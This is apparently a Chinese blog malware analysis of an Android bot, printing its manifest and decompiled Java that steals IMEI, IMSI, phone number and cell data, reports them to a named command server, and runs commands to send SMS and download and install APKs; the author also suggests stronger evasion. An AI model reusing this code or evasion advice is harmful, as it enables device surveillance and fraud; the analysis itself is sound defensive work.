`

android恶意程序分析 (三)

 
阅读更多
写道
83c4aa1deb06060db6fae4e13630ed18c6ebe6babc187443b5f4c265c2ee074f 分析报告

1.这个是


2. AndroidManifest.xml

<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="1" android:versionName="1.0" package="tp5x.WGt12"
xmlns:android="http://schemas.android.com/apk/res/android">
<uses-sdk android:minSdkVersion="4" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.INSTALL_PACKAGES" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_COARSE_UPDATES" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
<application android:label="@string/app_name" android:icon="@drawable/icon">
<activity android:label="@string/app_name" android:name=".Y6Cg03N">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<activity android:name="ru.alpha.WebActivity" />
<activity android:name="ru.alpha.HtmlActivity" />
<receiver android:name="ru.alpha.AlphaReceiver" />
<receiver android:name="BootReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED" />
<category android:name="android.intent.category.HOME" />
</intent-filter>
</receiver>
<service android:name="ru.alpha.AlphaService">
<intent-filter>
<action android:name="ru.alpha.AlphaServiceStart76" />
</intent-filter>
</service>
</application>
</manifest>

标红的是关键的,其中Y6Cg03N负责启动主界面以及别的service, BootReceiver负责开机启动


3. Y6Cg03N.java
public void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
try
{
Class localClass = Class.forName("ru.alpha.Alpha");
Class[] arrayOfClass = new Class[3];
arrayOfClass[0] = Class.forName("android.content.Context");
arrayOfClass[1] = Class.forName("java.lang.String");
arrayOfClass[2] = Class.forName("java.lang.String");
Constructor localConstructor = localClass.getConstructor(arrayOfClass);
Object[] arrayOfObject = new Object[3];
arrayOfObject[0] = getApplicationContext();
arrayOfObject[1] = "mapk01_20f";
arrayOfObject[2] = "76";
localConstructor.newInstance(arrayOfObject);
i = 0;
if (i < 3);
}
catch (Exception localException2)
{
try
{
Class.forName("tp5x.WGt12.Y6Cg03N").getMethod("load", new Class[0]).invoke(this, new Object[0]);
localSharedPreferences = getSharedPreferences("settings", 1);
if (localSharedPreferences.getBoolean("created", false))
if (!secondStart)
finish();
}
catch (Exception localException2)
{
try
{
while (true)
{
int i;
SharedPreferences localSharedPreferences;
Class.forName("tp5x.WGt12.Y6Cg03N").getMethod("showScreen", new Class[0]).invoke(this, new Object[0]);
return;
localException1 = localException1;
localException1.printStackTrace();
continue;
titles.add("");
texts.add("");
i++;
continue;
localException2 = localException2;
localException2.printStackTrace();
continue;
SharedPreferences.Editor localEditor = localSharedPreferences.edit();
localEditor.putBoolean("created", true);
localEditor.commit();
}
}
catch (Exception localException3)
{
while (true)
localException3.printStackTrace();
}
}
}
}


在oncreate中,主要调用了ru.alpha.Alpha的一个构造函数
public Alpha(Context paramContext, String paramString1, String paramString2)
其中string1= “mapk01_20f” paramString2 =“76”


Alpha的构造函数
public Alpha(Context paramContext, String paramString1, String paramString2)
{
System.out.println("Alpha START");
try
{
apiKey = paramString1;
appId = paramString2;
SharedPreferences.Editor localEditor = paramContext.getSharedPreferences(Constants.SETTINGS, 2).edit();
localEditor.putString(Constants.APP_ID, paramString2);
localEditor.putString(Constants.API_KEY, paramString1);
localEditor.commit();
imei = Functions.getImei(paramContext);
imsi = Functions.getImsi(paramContext);
phone = Functions.getPhone(paramContext);
startTimer(paramContext);
createShortcut(paramContext);
return;
}
catch (Exception localException)
{
while (true)
localException.printStackTrace();
}
}

构造函数中可以看到之前传进来的参数估计是用来区分app的,也就是说这个恶意代码可能感染或者编写了多个版本,需要加以参数控制和区分。后面的得到imei,imsi,和phone的代码都是成熟代码就不多说了。
然后是startTimer 这个方法

public static void startTimer(Context paramContext)
{
long l1 = paramContext.getSharedPreferences(Constants.SETTINGS, 2).getLong(Constants.NEXT_TIME, 0L);
long l2 = System.currentTimeMillis();
long l3 = l1 - l2;
System.out.println("appId: " + appId);
System.out.println("apiKey: " + apiKey);
System.out.println("imei: " + imei);
System.out.println("imsi: " + imsi);
System.out.println("phone: " + phone);
Intent localIntent = new Intent(paramContext, AlphaReceiver.class);
localIntent.setAction(Constants.NOTIFICATION_ACTION);
localIntent.putExtra(Constants.APP_ID, appId);
localIntent.putExtra(Constants.API_KEY, apiKey);
localIntent.putExtra(Constants.IMEI, imei);
localIntent.putExtra(Constants.IMSI, imsi);
localIntent.putExtra(Constants.PHONE, phone);
PendingIntent localPendingIntent = PendingIntent.getBroadcast(paramContext, 0, localIntent, 0);
AlarmManager localAlarmManager = (AlarmManager)paramContext.getSystemService("alarm");
System.out.println("offset: " + l3);
if (l3 > 0L)
localAlarmManager.set(0, l1, localPendingIntent);
while (true)
{
System.out.println("Alpha Timer START");
return;
localAlarmManager.set(0, l2 + Constants.MINUTE, localPendingIntent);
}
}
这个方法关键就是把前面读到的那些手机信息打包到了Extra,然后利用PendingIntent发送到了AlphaReceiver这个类中,action为NOTIFICATION_ACTION.

public class AlphaReceiver extends BroadcastReceiver
{
public void onReceive(Context paramContext, Intent paramIntent)
{
System.out.println("AlphaService START");
System.out.println("intent.getAction(): " + paramIntent.getAction());
if ((!paramIntent.getAction().equals(Constants.NOTIFICATION_ACTION)) || (Functions.checkInternetConnection(paramContext)));
try
{
String str1 = paramContext.getSharedPreferences(Constants.SETTINGS, 2).getString(Constants.APP_ID, "");
String str2 = paramIntent.getStringExtra(Constants.API_KEY);
String str3 = paramIntent.getStringExtra(Constants.IMEI);
String str4 = paramIntent.getStringExtra(Constants.IMSI);
String str5 = paramIntent.getStringExtra(Constants.PHONE);
System.out.println("appId: " + str1);
System.out.println("apiKey: " + str2);
System.out.println("imei: " + str3);
System.out.println("imsi: " + str4);
System.out.println("phone: " + str5);
Intent localIntent = new Intent();
// Constants .SERVICE = ru.alpha.AlphaServiceStart
localIntent.setAction(Constants.SERVICE + str1);
localIntent.putExtra(Constants.APP_ID, str1);
localIntent.putExtra(Constants.API_KEY, str2);
localIntent.putExtra(Constants.IMEI, str3);
localIntent.putExtra(Constants.IMSI, str4);
localIntent.putExtra(Constants.PHONE, str5);
localIntent.putExtra(Constants.TYPE, Constants.NOTIFICATION_TYPE);
paramContext.startService(localIntent);
while (true)
{
label352: return;
Alpha.startTimer(paramContext);
}
}
catch (Exception localException)
{
break label352;
}
}
}

启动了AlphaService,
public void onStart(Intent paramIntent, int paramInt)
{
super.onStart(paramIntent, paramInt);
try
{
System.out.println("AlphaService START");
System.out.println("checkInternetConnection:
//检查网络连接
" + Functions.checkInternetConnection(this));
if (Functions.checkInternetConnection(this))
{
System.out.println("intent.getAction(): " + paramIntent.getAction());
String str1 = paramIntent.getStringExtra(Constants.APP_ID);
String str2 = paramIntent.getStringExtra(Constants.API_KEY);
String str3 = paramIntent.getStringExtra(Constants.IMEI);
String str4 = paramIntent.getStringExtra(Constants.IMSI);
String str5 = paramIntent.getStringExtra(Constants.PHONE);
System.out.println("appId: " + str1);
System.out.println("apiKey: " + str2);
System.out.println("imei: " + str3);
System.out.println("imsi: " + str4);
System.out.println("phone: " + str5);
//把这些参数传给了服务器。Constants.SERVER = "http://m-001.net/index.php"
ServerResponse localServerResponse = Alpha.sendRequest(str2, str1, str3, str4, str5);
localServerResponse.printToOutStream();
Alpha.setNextTimeConnect(this, System.currentTimeMillis() + localServerResponse.wait * Constants.SECOND);
Alpha.startTimer(this);
if ((localServerResponse.notificationText.length() > 0) && (localServerResponse.notificationUrl.length() > 0))
//根据返回的结果调用了WebActivity
Alpha.showNotification(this, localServerResponse.notificationTickerText, localServerResponse.notificationTitle, localServerResponse.notificationText, localServerResponse.notificationIcon, localServerResponse.notificationUrl, WebActivity.class);
if (localServerResponse.openUrl.length() > 0)

Alpha.openUrl(this, localServerResponse.openUrl);
if (localServerResponse.showHtml.length() > 0)
Alpha.showHtml(this, new String(Base64.decode(localServerResponse.showHtml), "UTF-8"));
}
return;
}
catch (Exception localException)
{
while (true)
{
localException.printStackTrace();
stopSelf(paramInt);
}
}
finally
{
stopSelf(paramInt);
}
throw localObject;
}

启动WebActivity代码
public class WebActivity extends Activity
{
static AlphaApi api;

public void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
setTitle("");
api = new AlphaApi(this);
WebView localWebView = new WebView(this);
localWebView.getSettings().setJavaScriptEnabled(true);
localWebView.setWebChromeClient(new WebChromeClient()
{
//关键代码
public boolean onJsPrompt(WebView paramWebView, String paramString1, String paramString2, String paramString3, JsPromptResult paramJsPromptResult)
{
AlphaApiResult localAlphaApiResult = WebActivity.api.textToCommand(paramString2, paramString3);
if (localAlphaApiResult.find)
paramJsPromptResult.confirm(localAlphaApiResult.result);
for (int i = 1; ; i = 0)
return i;
}
});
localWebView.addJavascriptInterface(api, "alpha");
localWebView.clearCache(true);
localWebView.setScrollBarStyle(33554432);
String str = getIntent().getStringExtra("url");
System.out.println("url: " + str);
localWebView.loadUrl(str);
setContentView(localWebView);
((NotificationManager)getSystemService("notification")).cancelAll();
}
}

这里根据返回的response中得notificationUrl,来打开了chrome浏览器,其中的WebActivity.api是AlphaApi类,这个类是关键类,属于控制命令执行的类。它采用了监视页面事件中得prompt事件,通过prompt种的参数来实现bot的控制命令的功能。

AlphaApi类的关键方法
public AlphaApiResult textToCommand(String paramString1, String paramString2)
{
do
{
try
{
if (paramString1.equals("alpha.sendSms"))
{
String[] arrayOfString2 = paramString2.split("\\|");
//如果前面的prompt参数是alpha.sendSms这个,就发送短信
localAlphaApiResult = new AlphaApiResult(true, String.valueOf(sendSms(arrayOfString2[0], arrayOfString2[1])));
break;
}
//下载并安装指定的apk,非root后门安装。
if (paramString1.equals("alpha.install"))
{
String[] arrayOfString1 = paramString2.split("\\|");
install(arrayOfString1[0], arrayOfString1[1], arrayOfString1[2]);
localAlphaApiResult = new AlphaApiResult(true, "");
}
}
catch (Exception localException)
{
localException.printStackTrace();
localAlphaApiResult = new AlphaApiResult(false, "");
}
if (paramString1.equals("alpha.getGsm"))
{
localAlphaApiResult = new AlphaApiResult(true, getGsm());
break;
}
if (paramString1.equals("alpha.getImei"))
{
localAlphaApiResult = new AlphaApiResult(true, getImei());
break;
}
if (!paramString1.equals("alpha.getImsi"))
continue;
localAlphaApiResult = new AlphaApiResult(true, getImsi());
break;
}
while (!paramString1.equals("alpha.getPhone"));
AlphaApiResult localAlphaApiResult = new AlphaApiResult(true, getPhone());
return localAlphaApiResult;
}


Install的方法实质
public void threadOperationRun(int paramInt, Object paramObject)
{
String[] arrayOfString;
if (paramInt == 1)
{
arrayOfString = (String[])(String[])paramObject;
String str1 = System.currentTimeMillis() + ".apk";
String str2 = Environment.getExternalStorageDirectory() + "/download/";
if (!Functions.downloadFile(str2, arrayOfString[0], str1))
break label107;
this.progressDialog.dismiss();
Functions.installApk(this.context, str2 + str1);
}
while (true)
{
return;
label107: this.progressDialog.dismiss();
Toast localToast = Toast.makeText(this.context, arrayOfString[1], 1);
localToast.setGravity(17, 0, 0);
localToast.show();
}
}


Functions的代码
public class Functions
{
public static boolean checkInternetConnection(Context paramContext)
{
int i = 0;
try
{
ConnectivityManager localConnectivityManager = (ConnectivityManager)paramContext.getSystemService("connectivity");
if ((localConnectivityManager.getActiveNetworkInfo() != null) && (localConnectivityManager.getActiveNetworkInfo().isAvailable()))
{
boolean bool = localConnectivityManager.getActiveNetworkInfo().isConnected();
if (bool)
i = 1;
}
label45: return i;
}
catch (Exception localException)
{
break label45;
}
}

public static boolean downloadFile(String paramString1, String paramString2, String paramString3)
{
int i = 1;
try
{
HttpURLConnection localHttpURLConnection = (HttpURLConnection)new URL(paramString2).openConnection();
localHttpURLConnection.setRequestMethod("GET");
localHttpURLConnection.setDoOutput(true);
localHttpURLConnection.connect();
File localFile = new File(paramString1);
localFile.mkdirs();
FileOutputStream localFileOutputStream = new FileOutputStream(new File(localFile, paramString3));
InputStream localInputStream = localHttpURLConnection.getInputStream();
byte[] arrayOfByte = new byte[1024];
while (true)
{
int j = localInputStream.read(arrayOfByte);
if (j == -1)
break;
localFileOutputStream.write(arrayOfByte, 0, j);
}
localFileOutputStream.close();
localInputStream.close();
}
catch (IOException localIOException)
{
i = 0;
}
return i;
}

public static String getGsmData(Context paramContext)
{
Object localObject = "";
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
String str1 = localTelephonyManager.getNetworkOperator();
int i = Integer.parseInt(str1.substring(0, 3));
int j = Integer.parseInt(str1.substring(3));
GsmCellLocation localGsmCellLocation = (GsmCellLocation)localTelephonyManager.getCellLocation();
int k = localGsmCellLocation.getLac();
int m = localGsmCellLocation.getCid();
String str2 = i + ", " + j + ", " + k + ", " + m;
localObject = str2;
return localObject;
}
catch (Exception localException)
{
while (true)
localException.printStackTrace();
}
}

public static String getImei(Context paramContext)
{
Object localObject;
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
if (localTelephonyManager == null)
{
localObject = "";
}
else
{
String str = localTelephonyManager.getDeviceId();
localObject = str;
}
}
catch (Exception localException)
{
localException.printStackTrace();
localObject = "";
}
return (String)localObject;
}

public static String getImsi(Context paramContext)
{
Object localObject;
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
if (localTelephonyManager == null)
{
localObject = "";
}
else
{
String str = localTelephonyManager.getSubscriberId();
localObject = str;
}
}
catch (Exception localException)
{
localException.printStackTrace();
localObject = "";
}
return (String)localObject;
}

public static String getPhone(Context paramContext)
{
String str;
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
if (localTelephonyManager == null)
{
str = "";
}
else
{
str = localTelephonyManager.getLine1Number();
if (str == null)
str = "";
}
}
catch (Exception localException)
{
localException.printStackTrace();
str = "";
}
return str;
}

public static void installApk(Context paramContext, String paramString)
{
Intent localIntent = new Intent("android.intent.action.VIEW");
localIntent.setDataAndType(Uri.fromFile(new File(paramString)), "application/vnd.android.package-archive");
paramContext.startActivity(localIntent);
}

public static boolean sendSms(String paramString1, String paramString2)
{
return false;
}
}


总结:这款android bot的特点有两个,一个是大量采用了反射机制来调用函数,估计是为了规避api检测,不过不够彻底,应该采用动态解密api函数名,类名的方式更彻底。第二个是他的控制命令传递方式,采用了两级的方式,首先去指定网站获得控制命令的url,然后打开控制命令的url,根据这个url的页面js事件的参数,来调用bot控制命令,算是比较有特色的。


 

 

  • 大小: 76.3 KB
分享到:
评论

相关推荐

    android恶意程序分析 (四)

    在“Android恶意程序分析(四)”这一主题中,我们将深入探讨Android平台上的恶意软件及其分析方法。在当今数字化世界中,网络安全至关重要,尤其是对于移动设备用户而言,Android恶意程序的威胁日益增加。本文将...

    基于textCNN模型的Android恶意程序检测.pdf

    在Android恶意程序检测中,textCNN模型被用来识别和分析应用程序的行为特征,从而判断其是否具有恶意行为。 首先,该方法采用了多种触发机制,目的是从不同层面诱导并暴露潜在的恶意行为。这些触发机制可以模拟用户...

    Android Malware and Analysis (android恶意软件分析)

    手机等移动设备上存储的敏感信息越来越多,同时这些设备提供的恶意软件保护却相对有限,这直接导致了对安全专家的即时需求,这些专家需要了解如何应对Android恶意软件威胁及其分析。本文将基于《Android Malware and...

    Android恶意程序常用权限分析及统计研究.pdf

    本文通过对Android恶意程序常用权限的分析及统计研究,旨在为移动安全领域的研究者和应用开发者提供有价值的数据和方法。 研究首先对226个恶意程序样本进行了深入的分析,这些样本中所请求的权限高达15种之多。在...

    基于云计算的Android恶意程序协同检测系统.pdf

    Android恶意程序检测主要通过特征码匹配和行为分析两种方式。在本系统中,检测机制首先将待检测的Android应用与特征库中的特征码进行匹配。如果应用中的特征码与特征库中的某个恶意程序特征码匹配成功,系统将直接...

    Android恶意代码的逆向分析.pdf

    Android恶意代码的逆向分析.pdf Android 恶意代码的逆向分析是当前 Android 安全领域中的一项重要研究方向。本文主要研究基于逆向工程的 Android 应用程序中恶意代码的分析方法。该方法首先通过逆向工程获取 ...

    基于ICC的Android恶意程序检测方法.pdf

    【Android恶意程序检测方法概述】 Android恶意程序检测是网络安全领域中的一个重要课题,因为随着智能手机的广泛使用,Android系统的安全问题日益突出。据统计,大约85%的手机采用Android系统,因此,确保Android...

    一种Android恶意程序检测工具的实现.pdf

    为应对这一挑战,研究人员提出了基于行为分析的Android恶意程序检测工具,以提高对恶意软件的检测准确率。 在Android平台上,恶意程序的识别主要依赖于静态检测。这种方法通过对应用程序的代码和资源文件进行分析,...

    Android-Droidefense:高级的Android恶意软件分析框架

    **Android-Droidefense: 高级的Android恶意软件分析框架** 在移动安全领域,尤其是在Android平台上,恶意软件分析是至关重要的。Android-Droidefence是一个专门为Android恶意软件设计的高级分析框架,它旨在帮助...

    一种基于行为分析的Android系统恶意程序检测模型.pdf

    总的来说,基于行为分析的Android系统恶意程序检测模型是应对当前移动安全挑战的重要手段。通过深入理解和分析程序行为,可以及时发现并阻止恶意行为,保护用户隐私和设备安全,同时也为未来的移动安全研究提供了新...

    基于深度学习的Android恶意软件检测系统的设计和实现.pdf

    SDADLDroid是一个集成了静态和动态分析的Android恶意软件检测系统。该系统通过对应用程序静态代码特征和运行时行为特征的提取,结合深度学习技术,实现对恶意软件的识别。 知识点四:深度学习模型的选择 文章中提到...

    让你睡不着觉的 Android 恶意软件

    该网站汇集了大量的 Android 恶意软件样本,并对其进行了分类、分析和归档,为安全研究人员提供了宝贵的数据资源。 #### 四、深入探讨:AndroidManifest.xml 的秘密 ##### 1. AndroidManifest.xml 的非 XML 特性 ...

Global site tag (gtag.js) - Google Analytics